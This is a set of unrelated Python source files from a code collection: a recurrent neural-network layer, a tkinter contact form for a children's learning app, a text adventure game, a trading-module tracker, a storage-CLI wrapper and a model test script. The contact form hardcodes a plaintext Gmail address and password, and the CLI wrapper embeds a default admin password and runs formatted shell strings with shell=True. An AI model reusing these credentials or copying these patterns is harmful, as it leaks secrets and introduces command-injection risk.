filename=filename)\n return filename\n\n def statistiche(data):\n messaggio = (\"Statistiche dei treni circolanti:\"\n \"\\n🚅Treni oggi: {}\"\n \"\\n🚅Treni circolanti in questo momento: {}\"\n \"\\n✅Versione del bot: 3.1\".format(str(data['treniGiorno']), str(data['treniCircolanti'])))\n logging.info(\"Formattazione statistiche\")\n return messaggio\n","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":34023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"1001916","text":"import tensorflow as tf\nfrom .. import CustomLayer\n\nclass NeuromodulatedBistableRecurrentCellLayer(CustomLayer.CustomLayer):\n def __init__(self, output_dim, model, var_list = None, **kwargs):\n self.output_dim = output_dim\n self.state_size = output_dim\n super(NeuromodulatedBistableRecurrentCellLayer, self).__init__(output_dim, model, var_list, **kwargs)\n\n def build(self, input_shape):\n self.kernelz = self.add_weight(name=\"kz\", shape=(input_shape[1], self.output_dim), dtype=tf.float32,\n initializer='glorot_uniform')\n self.kernelr = self.add_weight(name=\"kr\", shape=(input_shape[1], self.output_dim), dtype=tf.float32,\n initializer='glorot_uniform')\n self.kernelh = self.add_weight(name=\"kh\", shape=(input_shape[1], self.output_dim), dtype=tf.float32,\n initializer='glorot_uniform')\n\n self.memoryz = self.add_weight(name=\"mz\", shape=(self.output_dim, self.output_dim), dtype=tf.float32,\n initializer='orthogonal')\n self.memoryr = self.add_weight(name=\"mr\", shape=(self.output_dim, self.output_dim), dtype=tf.float32,\n initializer='orthogonal')\n\n self.br = self.add_weight(name=\"br\", shape=(self.output_dim,), dtype = tf.float32, initializer='zeros')\n self.bz = self.add_weight(name=\"bz\", shape=(self.output_dim,), dtype = tf.float32, initializer='zeros')\n\n super(NeuromodulatedBistableRecurrentCellLayer, self).build(input_shape)\n\n def call(self, input, states):\n inp = input\n prev_out = states[0]\n z = tf.nn.sigmoid(tf.matmul(inp, self.kernelz) + tf.matmul(prev_out, self.memoryz) + self.bz)\n r = tf.nn.tanh(tf.matmul(inp, self.kernelr) + tf.matmul(prev_out, self.memoryr) + self.br)+1\n h = tf.nn.tanh(tf.matmul(inp, self.kernelh) + r * prev_out)\n output = (1.0 - z) * h + z * prev_out\n return output, [output]\n\n def get_initial_state(self, inputs=None, batch_size=None, dtype=tf.float32):\n return [tf.zeros(shape=(batch_size, self.output_dim), dtype=dtype)]","sub_path":"NetworkConstruction/CustomLayers/NeuromodulatedBistableRecurrentCellLayer.py","file_name":"NeuromodulatedBistableRecurrentCellLayer.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"201675073","text":"import math\nimport smtplib\nimport ssl\nfrom tkinter import *\nfrom tkinter import font as tkFont\nfrom tkinter import messagebox\nfrom email.mime.text import MIMEText\n\nclass ContactUs:\n def __init__(self, mainClass, backEnd):\n print(\" Entering Parent - Contact Us screen - /parent/frontEnd/dashboard/pages/contactUs.py\")\n\n def saveButtonClick():\n string = '\\n\\n\\n' + self.messageEntry.get(1.0, 'end-1c') + '\\n\\n\\nParent Name: ' + self.firstNameEntry.get() + ' ' + self.lastNameEntry.get() + '\\nParent Email: ' + self.emailEntry.get() + '\\nParent Phone #: ' + self.phoneNumberEntry.get() \n msg = MIMEText(string, 'plain')\n msg['Subject'] = 'Message from littleLEARNERs Parent: ' + self.firstNameEntry.get() + ' ' + self.lastNameEntry.get()\n\n #login\n port = 465\n my_mail = 'littlelearners411@gmail.com'\n my_password = '!!littleLEARNERS!!'\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL('smtp.gmail.com', port, context=context) as server:\n server.login(my_mail, my_password)\n server.sendmail(self.emailEntry.get(), my_mail, msg.as_string())\n\n \n \n \n def displayContactUs(): \n # pageTitle = Label(mainClass.rightFrame, font=('arial', 70, 'bold'), text=\"About\", background=\"white\")\n # pageTitle.pack() \n # backend init\n # backEnd.init()\n\n mainClass.rightFrame.update_idletasks() # Calls all pending idle tasks to get frame sizes\n self.rightFrameWidth = mainClass.rightFrame.winfo_width()\n self.rightFrameHeight = mainClass.rightFrame.winfo_height()\n \n # account information frame (left)\n self.aboutInformationFrame = Frame(mainClass.rightFrame, width=self.rightFrameWidth*0.7, height=self.rightFrameHeight - 100, bd=1, relief=\"groove\") \n self.aboutInformationFrame.configure(background='white')\n self.aboutInformationFrame.pack(side=LEFT, fill=BOTH, padx=(20), pady=(30))\n self.aboutInformationFrame.pack_propagate(0)\n\n self.manageAccountTitle = Label(self.aboutInformationFrame, text=\"Contact Us\", background=\"white\", font=\"bold\")\n self.manageAccountTitle.pack()\n\n self.aboutInformationEntriesFrame = Frame(self.aboutInformationFrame, height=self.rightFrameHeight - 100, bd=0, relief=\"groove\") \n self.aboutInformationEntriesFrame.configure(background='white')\n self.aboutInformationEntriesFrame.pack(side=LEFT, fill=BOTH, padx=(20), pady=(30))\n self.aboutInformationEntriesFrame.pack_propagate(0)\n\n #Email\n self.emailLabel = Label(self.aboutInformationEntriesFrame, text=\"Email: \", background=\"white\", font=\"bold\")\n self.emailLabel.grid(row=1,column=0, sticky=W)\n self.emailEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.emailEntry.grid(row=1,column=1, padx=(20, 0), pady=10)\n\n #First Name\n self.firstNameLabel = Label(self.aboutInformationEntriesFrame, text=\"First Name: \", background=\"white\", font=\"bold\")\n self.firstNameLabel.grid(row=2,column=0, sticky=W)\n self.firstNameEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.firstNameEntry.grid(row=2,column=1, padx=(20, 0), pady=10)\n \n #Last Name\n self.lastNameLabel = Label(self.aboutInformationEntriesFrame, text=\"Last Name: \", background=\"white\", font=\"bold\")\n self.lastNameLabel.grid(row=3,column=0, sticky=W)\n self.lastNameEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.lastNameEntry.grid(row=3,column=1, padx=(20, 0), pady=10)\n\n #Phone Number\n self.phoneNumberLabel = Label(self.aboutInformationEntriesFrame, text=\"Phone Number: \", background=\"white\", font=\"bold\")\n 
self.phoneNumberLabel.grid(row=4,column=0, sticky=W)\n self.phoneNumberEntry = Entry(self.aboutInformationEntriesFrame, width=30)\n self.phoneNumberEntry.grid(row=4,column=1, padx=(20, 0), pady=10)\n\n #Message\n self.messageLabel = Label(self.aboutInformationEntriesFrame, text=\"Message: \", background=\"white\", font=\"bold\")\n self.messageLabel.grid(row=5,column=0, sticky=W)\n self.messageEntry = Text(self.aboutInformationEntriesFrame, height = 10, width=60, bd=1, relief=\"groove\")\n self.messageEntry.grid(row=5,column=1, padx=(20, 0), pady=10)\n\n #Send Button\n self.sendButton= Button(self.aboutInformationFrame, width=20, text = \"SEND\", background=\"white\", font=\"bold\" ,command = lambda: saveButtonClick())\n self.sendButton.pack(side=BOTTOM, padx=(20), pady=(30))\n\n displayContactUs()\n\n\n\n\n\n","sub_path":"desktopApp/parent/frontEnd/parentPortal/pages/contactUs.py","file_name":"contactUs.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"333265385","text":"#The player decides between two caves, which hold either treasure or certain doom.\r\n\r\nimport random\r\nimport time\r\n\r\ndef introduction():\r\n\tprint('''Welcome Player.\r\n\tWould you like to play a game? (yes or no)''')\r\n\t\r\n\tdecision = input('> ')\r\n\t\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tif decision.lower() == 'no' or decision.lower() == 'n':\r\n\t\t\t\tprint('good-bye')\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tstart()\r\n\t\texcept ValueError:\r\n\t\t\tprint('Sorry player, didn\\'t understand your input.\\nPlease type again.')\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tbreak\r\n\r\ndef start():\r\n\tprint('''You are in a land full of dragons. In front of you,\r\n\tyou see two caves. In one cave, the dragon is friendly\r\n\tand will share his treasure with you. The other dragon\r\n\tis greedy and hungry, and will eat you on sight.\r\n\tWhich cave will you go into? (1 or 2)''')\r\n\tcaves()\r\n\t\r\ndef caves():\r\n\tcaveNumber = input('> ')\r\n\t\r\n\tif caveNumber.lower() == '1':\r\n\t\tfirst_path()\r\n\telif caveNumber.lower() == '2':\r\n\t\tsecond_path()\r\n\telse:\r\n\t\tprint(\"Try that again.\")\r\n\t\tcaves()\r\n\r\ndef first_path():\r\n\tprint('''You approach the cave...\r\n\tIt is dark and spooky...\r\n\tA large dragon jumps out in front of you! He opens his jaws and...''')\r\n\ttime.sleep(2)\r\n\tprint('''Gobbles you down in one bite!\r\n\tDo you want to play again? (yes or no)''')\r\n\tplay_again()\r\n\t\r\n\r\ndef second_path():\r\n\tprint('''You approach the cave...\r\n\tIt is dark and spooky...\r\n\tThe cave goes on... \r\n\tYou find a Torch on the wall and light it.''')\r\n\ttime.sleep(2)\r\n\tprint('''The light brightens the room and so see nothing but gold piled in the cave.\r\n\tDo you want to play again? (yes or no)''')\r\n\tplay_again()\r\n\r\n\t\t\r\ndef play_again():\r\n\tchoice = input('> ')\r\n\tif choice.lower() == 'yes':\r\n\t\tstart()\r\n\telif choice.lower() == 'no':\r\n\t\tprint(\"good-bye\")\r\n\telse:\r\n\t\tprint(\"sorry, what was that?\")\r\n\t\tplay_again()\r\n\t\t\r\n\r\nintroduction()\r\n\t\t","sub_path":"02_DragonRealm/dragon_realm.py","file_name":"dragon_realm.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"194090102","text":"\nimport decisionModule\nimport numpy as np\nimport utilities\nimport basic\nimport random\nimport switchModule\nimport populationModule\n\n##KEEPS TRACK OF BEST KNOWN PARAMETERS FOR EVERY TECHNICAL MODULE\nclass SwarmModule:\n\n ##RETURNED BY DECISION MODULE DESCRIBE\n #(indicator, activationValue, timePeriod, lowerValue, higherValue), lowerAction, higherAction\n def __init__(self):\n self.bestDecisionModules = {}\n self.bestJunctionModules = {}\n self.bestActivationModules = {}\n self.bestSwitchModules = {}\n self.indicatorStats = {}\n\n def recordDecisionModule(self, organismTuple):\n organism = organismTuple[0]\n\n indicator, activationValue, timePeriod, lowerValue, higherValue = organism.describe()[0]\n dataSource = organism.describe()[3]\n if dataSource not in self.bestDecisionModules:\n self.bestDecisionModules[dataSource] = {}\n if str(indicator) not in self.bestDecisionModules[dataSource]:\n self.bestDecisionModules[dataSource][str(indicator)] = {}\n if organism.getInactiveDecision() not in self.bestDecisionModules[dataSource][str(indicator)]:\n self.bestDecisionModules[dataSource][str(indicator)][organism.getInactiveDecision()] = {}\n\n self.bestDecisionModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, organism.describe()[1], organism.describe()[2])] = {\"run\":organismTuple[1], \"organism\":organism.constructCopy()}\n\n def recordJunctionModule(self, organismTuple): ##KEEP TRACK OF BEST JUNCTIONS BY DEPTH\n organism = organismTuple[0]\n depth = organismTuple[0].countModuleComponents()\n if str(depth) not in self.bestJunctionModules:\n self.bestJunctionModules[str(depth)] = {}\n if organism.getInactiveDecision() not in self.bestJunctionModules[str(depth)]:\n self.bestJunctionModules[str(depth)][organism.getInactiveDecision()] = {}\n self.bestJunctionModules[str(depth)][organism.getInactiveDecision()][str(organism.describe())] = {\"run\":organismTuple[1], \"organism\":organism.constructCopy()}\n\n def recordActivationModule(self, organismTuple): ##PARSE JUNCTION TREE FOR ACTIVATION FUNCTIONS\n organism = organismTuple[0]\n module1, module2 = organism.returnModules()\n for mod in [module1, module2]:\n if mod.objectType() == basic.BasicTrader.ACTIVATIONMOD:\n indicator, activationValue, timePeriod, lowerValue, higherValue = mod.describe()[0]\n dataSource = mod.describe()[3]\n if dataSource not in self.bestActivationModules:\n self.bestActivationModules[dataSource] = {}\n\n if str(indicator) not in self.bestActivationModules[dataSource]:\n self.bestActivationModules[dataSource][str(indicator)] = {}\n\n if organism.getInactiveDecision() not in self.bestActivationModules[dataSource][str(indicator)]:\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()] = {}\n\n if (timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2]) in self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()]:\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2])][\"runs\"] += [organismTuple[1]]\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2])][\"organisms\"] += [mod.constructCopy()]\n else:\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, 
mod.describe()[1], mod.describe()[2])] = {\"runs\":[organismTuple[1]], \"organisms\":[mod.constructCopy()]}\n\n ##DONT CALL RECURSIVELY BECAUSE CARE ABOUT CASE WHERE ACTIVATION IS NEAREST TOP OF TREE\n # elif mod.objectType() == basic.BasicTrader.JUNCTIONMOD:\n # ##CALL RECURSIVELY\n # self.recordActivationModule((mod, organismTuple[1])) ##ASSIGN SCORE OF ENTIRE JUNCTION\n\n def recordSwitchModule(self, organismTuple):\n organism = organismTuple[0]\n switchMethod = organism.returnJunctionMethod()\n if switchMethod.isSimple() == False: #NOT 'AND' or 'OR'\n # self.currentAction, self.technicalModule.describe(), self.lowerAction, self.higherAction\n indicator, activationValue, timePeriod, lowerValue, higherValue = switchMethod.describe()[1]\n dataSource = switchMethod.describe()[4]\n if dataSource not in self.bestSwitchModules:\n self.bestSwitchModules[dataSource] = {}\n\n if str(indicator) not in self.bestSwitchModules[dataSource]:\n self.bestSwitchModules[dataSource][str(indicator)] = {}\n\n if organism.getInactiveDecision() not in self.bestSwitchModules[dataSource][str(indicator)]:\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()] = {}\n if (timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3]) in self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()]:\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3])][\"runs\"] += [organismTuple[1]]\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3])][\"organisms\"] += [switchMethod.constructCopy()]\n else:\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3])] = {\"runs\":[organismTuple[1]], \"organisms\":[switchMethod.constructCopy()]}\n\n\n def getBestStatsForEachIndicator(self):\n raise NotImplementedError\n\n def getDecisionModuleStats(self):\n toReturn = {}\n for dataSource in self.bestDecisionModules:\n toReturn[dataSource] = {}\n for indicator in self.bestDecisionModules[dataSource]:\n toReturn[dataSource][indicator] = {}\n for inactiveTendency in self.bestDecisionModules[dataSource][indicator]:\n allScores = []\n for parameterSetting in self.bestDecisionModules[dataSource][indicator][inactiveTendency]:\n allScores.append(self.bestDecisionModules[dataSource][indicator][inactiveTendency][parameterSetting][\"run\"].getReturnDifference())\n if len(allScores) > 0:\n toReturn[dataSource][indicator][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n def getBestDecisionModuleForIndicator(self, dataSource, indicator, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if dataSource not in self.bestDecisionModules or str(indicator) not in self.bestDecisionModules[dataSource] or inactiveTendency not in self.bestDecisionModules[dataSource][str(indicator)]:\n return {}\n\n\n for params in self.bestDecisionModules[dataSource][str(indicator)][inactiveTendency]:\n valuesToChooseFrom[params] = (self.bestDecisionModules[dataSource][str(indicator)][inactiveTendency][params][\"run\"]).getReturnDifference()\n\n toReturn = {}\n for params in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[params] = 
valuesToChooseFrom[params]\n\n return toReturn\n\n def getDecision(self, dataSource, indicator, inactiveTendency, params):\n return self.bestDecisionModules[dataSource][str(indicator)][inactiveTendency][params][\"organism\"]\n\n def getJunctionModuleStats(self):\n toReturn = {}\n for depth in self.bestJunctionModules:\n toReturn[depth] = {}\n for inactiveTendency in self.bestJunctionModules[depth]:\n allScores = []\n for junction in self.bestJunctionModules[depth][inactiveTendency]:\n allScores.append(self.bestJunctionModules[depth][inactiveTendency][junction][\"run\"].getReturnDifference())\n if len(allScores) > 0:\n toReturn[depth][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n def getBestJunctionByDepth(self, depth, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if str(depth) not in self.bestJunctionModules or inactiveTendency not in self.bestJunctionModules[str(depth)]:\n return {}\n\n for junction in self.bestJunctionModules[str(depth)][inactiveTendency]:\n valuesToChooseFrom[junction] = (self.bestJunctionModules[str(depth)][inactiveTendency][junction][\"run\"]).getReturnDifference()\n toReturn = {}\n for junction in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[junction] = valuesToChooseFrom[junction]\n\n return toReturn\n\n def getJunction(self, depth, inactiveTendency, junctionDescription):\n return self.bestJunctionModules[str(depth)][inactiveTendency][junctionDescription][\"organism\"]\n\n def getBestActivationModuleForIndicator(self, dataSource, indicator, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if dataSource not in self.bestActivationModules or str(indicator) not in self.bestActivationModules[dataSource] or inactiveTendency not in self.bestActivationModules[dataSource][str(indicator)]:\n return {}\n\n for params in self.bestActivationModules[dataSource][str(indicator)][inactiveTendency]:\n scores = utilities.removeInf([score.getReturnDifference() for score in self.bestActivationModules[dataSource][str(indicator)][inactiveTendency][params][\"runs\"]])\n if len(scores) > 2:\n valuesToChooseFrom[params] = utilities.meanOfList(scores)\n toReturn = {}\n for params in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[params] = valuesToChooseFrom[params]\n return toReturn\n\n def getActivationModuleStats(self):\n toReturn = {}\n for dataSource in self.bestActivationModules:\n toReturn[dataSource] = {}\n for indicator in self.bestActivationModules[dataSource]:\n toReturn[dataSource][indicator] = {}\n for inactiveTendency in self.bestActivationModules[dataSource][indicator]:\n\n allScores = []\n for params in self.bestActivationModules[dataSource][indicator][inactiveTendency]:\n allScores += utilities.removeInf([score.getReturnDifference() for score in self.bestActivationModules[dataSource][indicator][inactiveTendency][params][\"runs\"]])\n if len(allScores) > 0:\n toReturn[dataSource][indicator][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n\n def getActivation(self, dataSource, indicator, inactiveTendency, params):\n allActivationOrganisms = self.bestActivationModules[dataSource][str(indicator)][inactiveTendency][params][\"organisms\"]\n return allActivationOrganisms[random.randint(0,len(allActivationOrganisms) - 1)]\n\n def getSwitchModuleStats(self):\n toReturn = {}\n for dataSource in self.bestSwitchModules:\n toReturn[dataSource] = {}\n for indicator in 
self.bestSwitchModules[dataSource]:\n toReturn[dataSource][indicator] = {}\n for inactiveTendency in self.bestSwitchModules[dataSource][indicator]:\n allScores = []\n for params in self.bestSwitchModules[dataSource][indicator][inactiveTendency]:\n allScores += utilities.removeInf([score.getReturnDifference() for score in self.bestSwitchModules[dataSource][indicator][inactiveTendency][params][\"runs\"]])\n if len(allScores) > 0:\n toReturn[dataSource][indicator][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n def getBestSwitchModuleForIndicator(self, dataSource, indicator, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if dataSource not in self.bestSwitchModules or str(indicator) not in self.bestSwitchModules[dataSource] or inactiveTendency not in self.bestSwitchModules[dataSource][str(indicator)]:\n return {}\n\n for params in self.bestSwitchModules[dataSource][str(indicator)][inactiveTendency]:\n scores = utilities.removeInf([score.getReturnDifference() for score in self.bestSwitchModules[dataSource][str(indicator)][inactiveTendency][params][\"runs\"]])\n if len(scores) > 2:\n valuesToChooseFrom[params] = utilities.meanOfList(scores)\n toReturn = {}\n for params in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[params] = valuesToChooseFrom[params]\n return toReturn\n\n def getSwitch(self, dataSource, indicator, inactiveTendency, params):\n allActivationOrganisms = self.bestSwitchModules[dataSource][str(indicator)][inactiveTendency][params][\"organisms\"]\n return allActivationOrganisms[random.randint(0,len(allActivationOrganisms) - 1)]\n","sub_path":"swarmModule.py","file_name":"swarmModule.py","file_ext":"py","file_size_in_byte":13774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"199798111","text":"from concurrent.futures import ThreadPoolExecutor\nimport subprocess\nimport re\nfrom logbook import Logger, StreamHandler, FileHandler\nimport sys\n\n'''\n记录日志到文件和STDOUT\n'''\n\nStreamHandler(sys.stdout, level='DEBUG').push_application()\nFileHandler('app.log', bubble=True, level='INFO').push_application()\n\nlog = Logger('uemcli')\n\nclass Device:\n def __init__(self, ip, username='admin', password='Password123!', cmd_base='echo'):\n self.ip = ip\n self.username = username\n self.password = password\n self.components = []\n self.cmd_head = f'{cmd_base} {username} -p {password} -d {ip}'\n\n def refresh_components(self, obj_str):\n component_list = []\n for item in Device.parse_result(self._run_cmd(f\"{self.cmd_head} {obj_str} show -output csv -detail\")):\n obj = Component(obj_str,item)\n component_list.append(obj)\n self.components = component_list\n return self\n\n def __repr__(self):\n return self.ip\n\n def _run_cmd(self, cmd_str):\n log.info(f'start {cmd_str}')\n # import time\n # import random\n # time.sleep(random.randint(3,10))\n p = subprocess.Popen(cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdoutput, erroutput = p.communicate()\n if p.returncode:\n log.error('error:\\n' + erroutput.decode(encoding='utf-16le'))\n else:\n log.info('out:\\n' + stdoutput.decode(encoding='utf-16le'))\n res = {'return_code': p.returncode,\n 'output': stdoutput.decode(encoding='utf-16le'),\n 'error': erroutput.decode(encoding='utf-16le')}\n return res\n\n def uemcli_one(self,cmd_str):\n res = self._run_cmd(f'{self.cmd_head} {cmd_str}')\n if res['return_code']:\n raise BaseException(res['error'])\n else:\n return res['output']\n\n def uemcli_group(self, cmd_str, args=[]):\n cmds = [f'{self.cmd_head} {cmd_str(it)}' for it in args]\n with ThreadPoolExecutor(max_workers=5) as executor:\n results = executor.map(self._run_cmd, cmds)\n return results\n\n @staticmethod\n def parse_result(result):\n lines = result['output'].split('\\n')\n lines[0]=re.sub('\\ufeff','',lines[0])\n keys = lines[0].split(',')\n keys = [eval(key) for key in keys]\n dict_list = []\n for line in lines[1:]:\n if line:\n values = line.split('\",\"')\n temp_dict = dict(zip(keys, values))\n dict_list.append(temp_dict)\n return dict_list\n\n def set_property(self, property_str):\n temp_f = lambda x: f'{self.cmd_head} {x.component_str} set id={x.properties[\"TTY\"]} {property_str}'\n self.uemcli_group(temp_f, self.components)\n\n def component_filter(self, criteria):\n import copy\n obj = copy.deepcopy(self)\n obj.components = filter(criteria, obj.components)\n return obj\n\n def greater_than(self, age):\n return self.component_filter(lambda x: x.properties['age'] > age)\n\n def filter_match(self, property, regexp):\n return self.component_filter(lambda x: re.search(regexp, x.properties[property], re.IGNORECASE))\n\n def filter_not_match(self, property, regexp):\n return self.component_filter(lambda x: not re.search(regexp, x.properties[property], re.IGNORECASE))\n\n def filter_equal(self, property, value):\n return self.component_filter(lambda x: x.properties[property] == str(value))\n\n def filter_not_equal(self, property, value):\n return self.component_filter(lambda x: x.properties[property] != str(value))\n\n\nclass Component:\n def __init__(self, component_str, properties_dict):\n self.component_str = component_str\n self.properties = properties_dict\n\n def __repr__(self):\n return f\"{self.component_str} {self.properties['Name']} \"\n\n\nif __name__ == \"__main__\":\n dev1 
= Device('10.229.20.171',cmd_base='uemcli -sslPolicy accept -noHeader -u')\n log.info(dev1)\n component_str = '/stor/prov/fs'\n # dev1.refresh_components(component_str)\n for it in dev1.refresh_components(component_str).filter_match('Name','Reid_FS_FLR').components:\n log.info(it)\n log.info(it.properties['Health state'])\n log.info(it.properties['Health details'])\n\n","sub_path":"uemcli/pute.py","file_name":"pute.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"502740910","text":"# ==================================================\n# Load and test a trained model on Traing Set.\n# ==================================================\nimport tensorflow as tf\nimport numpy as np\nimport preprocess\nfrom model import GRUModel\nfrom tensorflow.contrib import learn\n\nfrom config import *\n\nprint(\"Restoring Vocab...\")\ntest_data = preprocess.train_data(dataset)\nc = [y for x in test_data[2] for y in x]\nmax_len = max([len(x) for x in c])\nvocab = learn.preprocessing.VocabularyProcessor(max_len)\nvocab.fit(c)\n\n# 1/10 for testing\nidx = np.random.randint(len(test_data[0]), size=int(len(test_data[0])/10))\nqq, ll, cc, aa = zip(*[[test_data[0][i], test_data[1][i], test_data[2][i], test_data[3][i]] for i in idx])\n\ntruths = aa\n\nprint(\"Converting text to data...\")\ntrain_q = preprocess.build_vocab(qq, vocab)\ntrain_c = [preprocess.build_vocab(x, vocab) for x in cc]\ntrain_l = [preprocess.build_vocab(x, vocab) for x in ll]\ntrain_a = [train_l[i][x-1] for i, x in enumerate(aa)]\n\ndef generate_dataset():\n result = []\n for i, c in enumerate(train_c):\n r = train_a[i]\n q = train_q[i]\n chioces = train_l[i]\n for w in train_l[i]:\n if (r == w).all():\n continue\n result.append([c, q, r, w, truths[i]])\n return [[y, x[1], x[2], x[3], x[0], chioces, x[4]] for x in result for y in x[0]]\n\ntest_data = generate_dataset()\nidx = np.random.randint(len(test_data), size=len(qq))\ntest_data = [test_data[i] for i in idx]\nic, iq, ir, iw, ic_sents, chioces, truths = zip(*test_data)\n\nprint(\" [*] Max sentence length: {:d}\".format(max_len))\nprint(\" [*] Vocabulary Size: {:d}\".format(len(vocab.vocabulary_)))\nprint(\" [*] Test Question Size: {:d}\".format(len(test_data)))\n\n# ==================================================\nprint(\"Restoring Model...\")\ninput_c = tf.placeholder(tf.float32, [None, 1, max_len], name=\"ic\")\ninput_q = tf.placeholder(tf.float32, [None, 1, max_len], name=\"iq\")\ninput_r = tf.placeholder(tf.float32, [None, 1, max_len], name=\"ir\")\ninput_w = tf.placeholder(tf.float32, [None, 1, max_len], name=\"iw\")\nstate = tf.placeholder(tf.float32, [None, max_len], name=\"state\")\ndropout = tf.placeholder(tf.float32, name=\"dropout\")\n\nzero_input = [np.random.randn(1, max_len) for _ in range(batch_size)]\nzero_state = [np.random.randn(max_len) for _ in range(batch_size)]\ncosts = []\n\nsess = tf.Session()\nmodel = GRUModel(input_c, input_q, input_r, input_w, state, dropout, num_hidden=max_len)\nmodel.load(sess, save_dir='save', dataset=dataset)\n\n# ==================================================\ndef encode(c_batch, q_batch):\n def merge(article, question):\n prev = zero_state\n for sent in article:\n prev = sess.run(model.prediction, {\n input_c: [sent],\n input_q: [question],\n input_r: zero_input, input_w: zero_input, state: prev, dropout: 0})\n return prev\n assert len(c_batch) == len(q_batch), \"Must input same bacth size of context and question\"\n encode_batch = [merge(c, q) for c, q in zip(c_batch, q_batch)]\n return encode_batch\n\n# ==================================================\nnum_correct = 0\n\nprint(\"Running Model...\")\nfor epoch in range(len(test_data)):\n# for epoch in range(1):\n\n idx = np.random.randint(len(test_data))\n # generate batches\n batch_iq = [[iq[idx]]] * batch_size\n batch_ir = [[ir[idx]]] * batch_size\n batch_iw = [[iw[idx]]] * batch_size\n # batch_answers\n answers = chioces[idx]\n batch_ans1 = [[answers[0]]] * batch_size\n batch_ans2 = [[answers[1]]] * batch_size\n batch_ans3 = 
[[answers[2]]] * batch_size\n batch_ans4 = [[answers[3]]] * batch_size\n # batch_context\n c_batch = [ic_sents[idx]] * batch_size\n c_batch = [[[y] for y in x] for x in c_batch]\n # encode context & question for all context sentences\n batch_enc = encode(c_batch, batch_iq)\n\n # evaluate on training data\n error = sess.run(model.cosine_cost, {\n input_c: zero_input, input_q: zero_input, input_r: batch_ir, input_w: batch_iw, state: batch_enc[0], dropout: 1})\n costs.append(error)\n # evaluate chioces\n sims = []\n for x in (batch_ans1, batch_ans2, batch_ans3, batch_ans4):\n sims.append(sess.run(model.cosine_cost, {\n input_c: zero_input, input_q: zero_input, input_r: x, input_w: x, state: batch_enc[0], dropout: 1}))\n best_ans = sims.index(min(sims))\n true_ans = truths[idx]\n if best_ans == int(true_ans):\n num_correct += 1\n print('Question {:3d} cosine cost: {:2.5f}, mean cost: {:2.5f}. guess: {:d}, true: {:d}, correct rate: {:3.1f}%'.format(\n epoch + 1, error, sum(costs) / len(costs), best_ans, true_ans, num_correct / (epoch + 1) * 100))\n print('Sims: {:3.5f} {:3.5f} {:3.5f} {:3.5f}'.format(sims[0], sims[1], sims[2], sims[3]))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
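The answer-selection step in test.py ranks the four choices by cosine cost and takes the argmin. A minimal self-contained sketch of that ranking on dummy vectors (numpy only; the names here are illustrative, not from the script):

import numpy as np

def cosine_cost(a, b):
    # 1 - cosine similarity, so a smaller value means a closer match
    return 1.0 - np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))

state = np.random.randn(64)              # stands in for the encoded context+question
choices = [np.random.randn(64) for _ in range(4)]
sims = [cosine_cost(state, c) for c in choices]
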